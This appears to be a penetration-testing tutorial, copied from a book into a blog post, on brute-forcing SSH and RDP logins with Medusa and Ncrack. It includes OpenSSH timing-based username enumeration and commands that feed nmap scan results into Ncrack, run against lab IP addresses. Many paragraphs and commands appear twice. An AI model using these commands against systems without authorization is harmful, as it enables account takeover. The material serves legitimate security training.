MEDUSA
Medusa is an alternative to Hydra and is a really fast password cracking tool. It is a parallel brute force tool just like Hydra. However, it is much more stable and faster than Hydra because it uses “Pthread,” meaning that it won’t necessarily duplicate the information, whereas Hydra uses “fork” for parallel processing. To know more about why Medusa is better, you can refer to its official documentation, the link of which is given in the following.
BASIC SYNTAX
To check for available options in Medusa, we will execute “Medusa” command without parameters. As you can see from the screenshot, we need four parameters in order to run Medusa.
–h = Hostname to attack
–u = Username to attack
–P = Password file
–M = Service to attack
–h = Hostname to attack
–u = Username to attack
–P = Password file
–M = Service to attack
OPENSSH USERNAME DISCOVERY BUG
In the following example, we will use Medusa to crack the SSH password, but before that, we will use an OpenSSH username discovery bug to gather a valid username. OpenSSH is one of the most widely used software for providing encrypted communications over the network. In order to perform a more efficient brute force attack, it’s necessary for a penetration tester to know existing usernames. With SSH, there is a small trick that was brought to attention recently by a security researcher at “cureblog.de”.
The problem with Open-SSH is that it checks if the user exists even before it validates the
password. So, supplying a password with large length of data causes it to go very slow thus inducing the long delay of check. Summing it up, when supplying a password with a large length, if a username exists, the delay is high, and if a username does not exist, the delay is low. A security researcher, Tyler Borland, has written a python script to automate this process.
The script is available at
https://code.google.com/p/multiproc-openssh-username-bruteforce/source/browse/ssh_user_
enum.py
Note: Also, the bug does not always work and at the time of writing, it’s not known under what exact conditions the bug works.
The problem with Open-SSH is that it checks if the user exists even before it validates the
password. So, supplying a password with large length of data causes it to go very slow thus inducing the long delay of check. Summing it up, when supplying a password with a large length, if a username exists, the delay is high, and if a username does not exist, the delay is low. A security researcher, Tyler Borland, has written a python script to automate this process.
The script is available at
https://code.google.com/p/multiproc-openssh-username-bruteforce/source/browse/ssh_user_
enum.py
Note: Also, the bug does not always work and at the time of writing, it’s not known under what exact conditions the bug works.
USAGE
The usage is extremely simple. Here is the basic syntax, which would check if a username with root is available or not.
root@root:#./ssh_user_enum.py -user root -Host <iP>
root@root:#./ssh_user_enum.py -user root -Host <iP>
CRACKING SSH WITH MEDUSA
In our previous example, with password cracking, we used Hydra to crack ftp passwords. In this example, we will use Medusa to crack SSH accounts. We will issue the following command to get the job done:
medusa –h 192.168.75.141 –u root –P password.txt –M ssh
medusa –h 192.168.75.141 –u root –P password.txt –M ssh
After a few attempts, it managed to find the correct password, which was “rafay”. Now, you
can log in to the SSH server using your favorite SSH client such as putty.
Note: Medusa gave us the correct password as it was available in the wordlist, as we put in there for a demonstration.
Documentation:
can log in to the SSH server using your favorite SSH client such as putty.
Note: Medusa gave us the correct password as it was available in the wordlist, as we put in there for a demonstration.
Documentation:
NCRACK
Ncrack is one of my favorite tools for password cracking. It is based upon nmap libraries. It comes preinstalled with BackTrack. It can be combined with nmap to yield great results. The only disadvantage I see with this tool is that it supports very few services, namely, FTP, SSH, Telnet, FTP, POP3, SMB, RDP, and VNC.
BASIC SYNTAX
We can execute the “ncrack” command without parameters in the terminal to find out what
parameters are required for using ncrack.
–u = Username to attack
–P = Password file
–p = Port of the service to attack (lowercase p)
–f = Quit cracking after the first credential is found
parameters are required for using ncrack.
–u = Username to attack
–P = Password file
–p = Port of the service to attack (lowercase p)
–f = Quit cracking after the first credential is found
CRACKING AN RDP WITH NCRACK
It’s funny how I always see the question “How do I crack an RDP?” on multiple hacking/security forums, as the process is quite simple. RDP stands for remote desktop protocol, which is generally used for remote management purposes.
As I have already demonstrated how to crack ftp and ssh with hydra and medusa, we will learn to crack an RDP account with ncrack. But before that, let’s take a look at an interesting case study.
As I have already demonstrated how to crack ftp and ssh with hydra and medusa, we will learn to crack an RDP account with ncrack. But before that, let’s take a look at an interesting case study.
CASE STUDY OF A MORTO WORM
In August 2010, F-secure published an interesting story about a worm named “Morto,” which was dangerously spread via networks across the world. The worm took advantage of people using weak/ default passwords for their RDP log-ins such as administrator, password, and 123456. When Morto found an RDP, it tried a list of default passwords. Once it logged in to an RDP, it started to scan for port MS-Term-Service listening on port 3389 on the local area network, and it used the same password list to connect to it again. In this way, it spread very fast.
Now that you have been made aware of how leaving an RDP with default passwords can be
dangerous for an organization, let us try cracking it with Ncrack.
Command:
Now that you have been made aware of how leaving an RDP with default passwords can be
dangerous for an organization, let us try cracking it with Ncrack.
Command:
ncrack –v –u administrator –P/pentest/passwords/wordlists/darkc0de.lst
rdp://192.168.75.140
rdp://192.168.75.140
The –v is an additional parameter I specified here, which is used for verbosity, followed by
the –u parameter for username, –P for password, and finally rdp:// followed by the IP address of the target. Once our credentials are cracked, we can use rdesktop to log in to the RDP.
Command:
the –u parameter for username, –P for password, and finally rdp:// followed by the IP address of the target. Once our credentials are cracked, we can use rdesktop to log in to the RDP.
Command:
rdesktop –u administrator –p aedis
COMBINING NMAP AND NCRACK FOR OPTIMAL RESULTS
As mentioned before, ncrack can be combined with nmap for more effective results. We have already learnt to output the results in an XML file using oX command from nmap in the scanning post. If you are not familiar with it, go back and review the scanning post.
In this particular example, we will scan our network for all live hosts with open ports within our local network 192.168.75.1/24 and then export the results to ncrack, where it will automatically attempt to crack all the services requiring authentication.
Now, from ncrack, we will execute the following command to brute-force all the network
services requiring authentication.
In this particular example, we will scan our network for all live hosts with open ports within our local network 192.168.75.1/24 and then export the results to ncrack, where it will automatically attempt to crack all the services requiring authentication.
Now, from ncrack, we will execute the following command to brute-force all the network
services requiring authentication.
Note: This will not work for ms-term-service due to a bug in the tool. Therefore, for rdp, you need to try it separately by using the method I explained earlier.
Command:
Command:
ncrack –vv –u administrator –P/pentest/passwords/wordlists/darkc0de.lst
–iX/root/Desktop/output.xml –f
–iX/root/Desktop/output.xml –f
ncrack will now start cracking the services that have authentication, leaving out the others. So now you’ve seen how easy it is to combine nmap and ncrack to automate our process.
No comments:
Post a Comment